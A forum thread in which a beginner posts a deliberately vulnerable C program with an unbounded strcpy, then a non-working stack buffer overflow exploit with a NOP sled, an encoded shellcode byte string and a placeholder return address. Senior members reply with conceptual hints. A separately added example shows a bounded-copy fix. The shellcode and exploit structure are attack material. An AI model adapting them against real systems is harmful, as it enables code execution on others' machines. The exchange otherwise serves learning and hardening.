Thread: Buffer Overflow doesn't work

  1. #1, posted by Noktec (Just burned his ISO; joined Dec 2007; 8 posts)

    Buffer Overflow doesn't work

    Hi,
    (First, sorry for my bad English; be patient, I'm a beginner, and thanks a lot for your help.)

    I have read a tutorial,
    and the vulnerable program was


    Code:
    #include <stdio.h>
    #include <string.h>
    
    int Aelphaeis();
    
    int main(int argc, char **argv)
    {
    char buffer[256];
    strcpy(buffer, argv[1]);   /* unbounded copy of argv[1]: this is the overflow the tutorial demonstrates */
    printf("%s", buffer);
    return 0;
    }
    
    /* never called by main() */
    int Aelphaeis()
    {
    printf("ub3r secret c0de\n");
    return 0;
    }

    So I saw that the buffer was 256 chars, but when I created my little exploit
    my computer gives an overflow error at 268 bytes.

    My shellcode is 164 bytes.

    268 - 164 => 104 bytes (of NOPs)

    I have written this exploit:

    Code:
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>   /* system() */
    
    int main()
    {
    int x=0;
    unsigned char exploit[400]="vuln.exe ";   /* command line: program name, then the payload as argv[1] */
    unsigned char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    unsigned char scode[]="\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2a\x7a\x5f\x35\x83\xeb\xfc\xe2\xf4\xd6\x92\x1b\x35\x2a\x7a\xd4\x70\x16\xf1\x23\x30\x52\x7b\xb0\xbe\x65\x62\xd4\x6a\x0a\x7b\xb4\x7c\xa1\x4e\xd4\x34\xc4\x4b\x9f\xac\x86\xfe\x9f\x41\x2d\xbb\x95\x38\x2b\xb8\xb4\xc1\x11\x2e\x7b\x31\x5f\x9f\xd4\x6a\x0e\x7b\xb4\x53\xa1\x76\x14\xbe\x75\x66\x5e\xde\xa1\x66\xd4\x34\xc1\xf3\x03\x11\x2e\xb9\x6e\xf5\x4e\xf1\x1f\x05\xaf\xba\x27\x39\xa1\x3a\x53\xbe\x5a\x66\xf2\xbe\x42\x72\xb4\x3c\xa1\xfa\xef\x35\x2a\x7a\xd4\x5d\x16\x25\x6e\xc3\x4a\x2c\xd6\xcd\xa9\xba\x24\x65\x42\x8a\xd5\x31\x75\x12\xc7\xcb\xa0\x74\x08\xca\xcd\x19\x3e\x59\x49\x54\x3a\x4d\x4f\x7a\x5f\x35";
    unsigned char retour[]="\x04\x03\x02\x01";   /* intended return address, written little-endian */
    printf("etape 1");                           /* "etape" = step (French) */
    strcat(exploit,nop);
    printf("\netape 2");
    strcat(exploit,scode);
    printf("\netape 3");
    strcat(exploit,retour);
    printf("\netape 4\n");
    x=strlen(exploit);
    printf("etape 5\n");
    printf("%d\n",x);          /* total length of the assembled command line */
    system(exploit);           /* runs vuln.exe with the assembled argument */
    printf("\nexploit ok\n");
    system("PAUSE");
    return 0;
    }

    But it doesn't work,

    and I don't have the solution. Can you help me please?

    Thanks
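Added here as an example, not code from the thread or its tutorial: the same program with the strcpy replaced by a bounded copy and the argc check the original lacks, so an argument of 268 bytes is rejected instead of being written over the saved frame. The names safe_copy_arg and hardened_main are chosen for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUFSZ 256   /* same buffer size as the thread's vuln.exe */

/* Copy src into dst (capacity dstsz) only if it fits, NUL included.
 * Returns 0 on success; -1 if src is missing or too long, in which case
 * dst is left as an empty string. Nothing is ever written past
 * dst[dstsz - 1], so the saved frame below the buffer cannot be reached. */
int safe_copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;

    if (dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    while (n < dstsz && src[n] != '\0')   /* bounded scan, unlike strlen */
        n++;
    if (n >= dstsz)                       /* no room for the terminator */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* The thread's main() with the two checks it lacks: argc, and a bounded
 * copy in place of strcpy. Returns the process exit status. */
int hardened_main(int argc, char **argv)
{
    char buffer[BUFSZ];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (safe_copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument longer than %d bytes rejected\n", BUFSZ - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    return hardened_main(argc, argv);
}
```

Building the original program with gcc's -fstack-protector-all would additionally turn a silent overwrite of the saved frame into an abort at function return.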

  2. #2, posted by ShadowKill (Senior Member; joined Dec 2007; 908 posts)

    Quote Originally Posted by Noktec (post #1 above, quoted in full)

    NOPs aren't used simply to fill the buffer space, they are used to "slide" the execution to a specific point in memory. Do some more research into how BoFs work, read Jon Erickson's Hacking: The Art Of Exploitation, and then you'll have a better grasp on what's going on......

    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  3. #3, posted by Noktec (Just burned his ISO; joined Dec 2007; 8 posts)

    Yes, I know that, but my exploit does not work.

  4. #4, posted by ShadowKill (Senior Member; joined Dec 2007; 908 posts)

    Quote Originally Posted by Noktec:
    Yes, I know that, but my exploit does not work.
    And it doesn't work because you don't understand it and can't do simple math. I'd love to help you but you need to help yourself first....

    Take a look at your numbers again. Look at your buffer, figure your return address according to buffer size - (NOP+shellcode), which brings up the question of why the hell is your shellcode so large, and go from there.

    Like I said before, read up on BoFs, then compare what that information is telling you and what you did. You'll see where you went wrong....

